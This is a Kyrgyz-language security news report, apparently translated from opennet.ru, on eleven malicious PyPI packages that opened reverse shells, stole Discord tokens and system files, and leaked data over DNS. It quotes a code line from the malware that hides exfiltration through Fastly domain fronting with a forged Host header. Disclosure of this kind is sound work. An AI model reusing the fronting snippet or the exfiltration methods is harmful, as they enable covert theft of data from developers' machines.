PyPI (Python Package Index) каталогунда зыяндуу кодду камтыган 11 пакет аныкталган. Көйгөйлөр аныкталганга чейин пакеттер жалпысынан 38 миңге жакын жолу жүктөлүп алынган. Табылган зыяндуу пакеттер чабуулчулардын серверлери менен байланыш каналдарын жашыруу үчүн татаал ыкмаларды колдонуусу менен өзгөчөлөнөт.
- маанилүү пакет (6305 жүктөө), маанилүү-пакет (12897) - системага кабыкча жеткиликтүүлүктү камсыз кылуу үчүн pypi.python.org сайтына туташуу жамынуусу менен тышкы серверге туташууну орнотту (тескери кабык) жана trevorc2 программасын жашыруу үчүн колдонду. Байланыш каналы.
- pptest (10001), ipboards (946) - DNS тутум жөнүндө маалыматты берүү үчүн байланыш каналы катары колдонулат (биринчи пакетте хосттун аты, жумушчу каталогу, ички жана тышкы IP, экинчисинде - колдонуучунун аты жана хост аты) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - системадагы Discord кызмат белгисин аныктап, аны тышкы хостко жөнөттү.
- trrfab (287) - тышкы хостко идентификаторду, хосттун аталышын жана /etc/passwd, /etc/hosts, /home мазмунун жөнөттү.
- 10Cent10 (490) - тышкы хост менен тескери кабык байланышын түздү.
- yandex-yt (4183) - система бузулуп жатканы жана nda.ya.ru (api.ya.cc) аркылуу берилген андан аркы аракеттер тууралуу кошумча маалымат бар баракка багытталып жатканы жөнүндө билдирүүнү көрсөттү.
Өзгөчө белгилей кетчү нерсе, маанилүү жана маанилүү пакет пакеттеринде колдонулган тышкы хостторго кирүү ыкмасы, алардын активдүүлүгүн жашыруу үчүн PyPI каталогунда колдонулган Fastly мазмун жеткирүү тармагын колдонгон. Чындыгында, сурамдар pypi.python.org серверине жөнөтүлгөн (анын ичинде HTTPS сурамынын ичинде SNIде python.org атын көрсөтүү), бирок HTTP "Хост" аталышында чабуулчулар көзөмөлдөгөн сервердин аталышы камтылган (сек. forward.io. global.prod.fastly.net). Мазмун жеткирүү тармагы маалыматтарды өткөрүп жатканда pypi.python.org сайтына TLS туташуу параметрлерин колдонуп, чабуулчу серверге ушундай суроо-талапты жөнөткөн.
PyPI инфраструктурасы Fastly мазмун жеткирүү тармагы менен иштейт, ал типтүү суроо-талаптарды кэштөө үчүн Varnish тунук проксисин колдонот, ошондой эле HTTPS сурамдарын прокси аркылуу жөнөтүү үчүн акыркы серверлерде эмес, CDN деңгээлинде TLS сертификатын иштетүүнү колдонот. Максаттуу хостко карабастан, суроо-талаптар проксиге жөнөтүлөт, ал HTTP “Хост” башын колдонуу менен каалаган хостту аныктайт жана хост домендик аталыштары бардык Fastly кардарлары үчүн мүнөздүү болгон CDN жүк баланстоочу IP даректерине байланган.
Чабуулчулардын сервери CDN Fastly менен да катталат, ал бардыгына акысыз пландарды берет жана атүгүл анонимдүү каттоого мүмкүндүк берет. Белгилей кетчү нерсе, жабырлануучуга суроо-талаптарды жөнөтүү үчүн "тескери кабыкты" түзүүдө схема да колдонулат, бирок чабуулчунун хосту тарабынан демилгеленген. Сырттан караганда, чабуулчулардын сервери менен өз ара аракеттенүү PyPI TLS сертификаты аркылуу шифрленген PyPI каталогу менен мыйзамдуу сессияга окшош. Окшош ыкма, "домендик фронт" деп аталган, мурда блоктоону кыйгап өтүүдө хосттун атын жашыруу үчүн жигердүү колдонулган, кээ бир CDN тармактарында SNIде жасалма хостту көрсөтүү жана чындыгында атын өткөрүп берүү аркылуу HTTPSге кирүү мүмкүнчүлүгүн колдонуу менен колдонулган. TLS сессиясынын ичиндеги HTTP Хост башындагы суралган хост.
Зыяндуу аракеттерди жашыруу үчүн TrevorC2 пакети сервер менен кадимки веб навигацияга окшош өз ара аракеттенүү үчүн кошумча колдонулган, мисалы, “https://pypi.python.org/images/” сүрөтүн жүктөө жамынуусу менен зыяндуу суроо-талаптар жөнөтүлгөн. guid =” guid параметринде маалыматты коддоо менен. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, аталыштар = {'Хост': "psec.forward.io.global.prod.fastly.net"})
pptest жана ipboards топтомдору DNS серверине суроо-талаптардагы пайдалуу маалыматты коддоштуруунун негизинде тармак активдүүлүгүн жашыруу үчүн башка ыкманы колдонушкан. Кесепеттүү программа маалыматты "nu4timjagq4fimbuhe.example.com" сыяктуу DNS суроо-талаптарын аткаруу менен өткөрөт, мында башкаруу серверине берилүүчү маалыматтар субдомендик аталыштагы base64 форматын колдонуу менен коддолгон. Чабуулчу бул билдирүүлөрдү example.com доменинин DNS серверин башкаруу аркылуу алат.
Source: opennet.ru